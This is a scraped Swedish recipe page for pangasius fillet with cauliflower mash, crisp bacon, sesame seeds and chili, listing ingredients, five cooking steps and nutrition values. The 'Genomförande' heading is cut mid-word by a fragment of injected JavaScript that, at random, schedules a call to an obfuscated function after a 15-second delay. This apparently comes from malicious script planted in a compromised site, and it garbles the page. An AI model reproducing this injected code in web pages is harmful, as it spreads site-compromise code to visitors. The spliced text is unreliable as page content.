Pangasiusfilé med blomkålsmos och knaprig bacon
2013-07-02- Cuisine: Asiatiskt, Svenskt
- Course: Huvudrätter
- Skill Level: Medel
- Servings : 1
- Prep Time : 5m
- Cook Time : 15m
- Ready In : 20m
Pangasius filè med blomkålsmos oct knaprig bacon
Receptet har en asiatisk och svensk smak. Den hettan som finns i fisken balanseras perfekt med den milda blomkålsmosen.
Ingredienser
- 1 pangasius filé
- 1/2 blomkål blomkålshuvud 10-15 buketter
- 1 msk smör
- 1-2 pressade vitlöksklyftor
- 40 g lätt bacon
- 1 msk sesamfrön
- 2 tsk chiliflingor
3 msk smör för stekning av filén
Genomförandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e
Steg 1
Lägg filén på en tallrik och fördela den pressade vitlöken jämnt på båda sidorna. Strö över chilin och och peppra och salta på båda sidorna. Ta halva blomkålshuvudet och se till att bryta buketterna till mindre bitar, lägg dem i ett durkslag och skölj av. Lägg buketterna i en kastrull med 2 dl vatten, låt koka upp på svag värme i ca 10 min.
Steg 2
Häll av vattnet som blir kvar och lägg i en 1 msk smör, salta och peppra lite, sedan är det bara att sätta igång att mixa blomkålen med en stavmixer eller i en matberedare.
Steg 3
Skiva baconen i mindre bitar, du kan välja själv om du vill steka eller köra baconen i micron. Se till att baconen får en ordentlig stektid så att dem blir knapriga. När baconen är klara så lägg dem inbäddade i lite papper så det överflödiga fettet sugs ut och låt vila.
Steg 4
Strö över sesamfröna på båda sidorna av filén precis innan stekning. Stek upp fisken på hög värme första minuten och sänk sedan värmen lite, så att den får en fin färg. Cirka 3 min på vardera sida.
Steg 5
Om du vill ha lite extra sting på fisken så är det bara att krydda på med chili, peppar och salt under stekningen. Lägg upp fisken, blomkålsmosen och baconen på en tallrik och servera med lite rödlök och skiva citron.
Medlemsbetyg
(5 / 5)
1 people rated this recipe
Related Recipes:
Näringssinnehåll
Informationen gäller per portion
-
kcal
420 -
protein
35 -
kolhydrater
8 -
fett
23